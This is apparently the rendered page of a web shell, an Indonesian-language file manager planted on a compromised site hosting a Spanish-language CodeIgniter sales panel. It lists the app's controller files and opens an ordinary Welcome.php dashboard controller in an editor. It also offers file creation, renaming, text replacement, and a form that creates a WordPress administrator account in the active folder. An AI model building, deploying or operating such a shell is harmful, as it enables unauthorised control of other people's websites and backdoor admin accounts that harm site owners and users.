📝 File Editor (IP: )
📂 Root Folder:
🔍 Buka
📁 Daftar isi: /home/goblinst/public_html/cuentas.goblinstreaming21.com/application/controllers
⬅️ Kembali ke folder sebelumnya
📄
Clientes.php
📄
Configuraciones.php
📄
Login.php
📄
Paneles.php
📄
Perfiles.php
📄
Productos.php
📄
Servicios.php
📄
Usuarios.php
📄
Ventas.php
📄
Welcome.php
📄
index.html
📁 Folder Baru:
+ Buat
📄 File Baru:
+ Buat
✏️ Rename:
Clientes.php
Configuraciones.php
Login.php
Paneles.php
Perfiles.php
Productos.php
Servicios.php
Usuarios.php
Ventas.php
Welcome.php
index.html
➡️
Rename
➕ Tambah User WordPress (folder aktif)
👤 Username:
📧 Email:
🔒 Password:
➕ Buat User WP (admin)
📝 Mengedit: Welcome.php
<?php defined('BASEPATH') or exit('No direct script access allowed'); class Welcome extends CI_Controller { public function __construct() { parent::__construct(); //cargar los modelos $this->load->model('venta'); $this->load->model('cliente'); } public function index() { $data["clientesActivos"] = $this->cliente->sumaDeClientesActivos(); $data["clientesInactivos"] = $this->cliente->sumaDeClientesInactivos(); $data["ventasPorFechas"] = $this->venta->ventasPorFechas(); $this->load->view('header'); $this->load->view('panel/index', $data); $this->load->view('footer'); } }
💾 Simpan
🔁 Replace Teks (Ctrl+H)
Cari:
Ganti Dengan:
Replace All
Tutup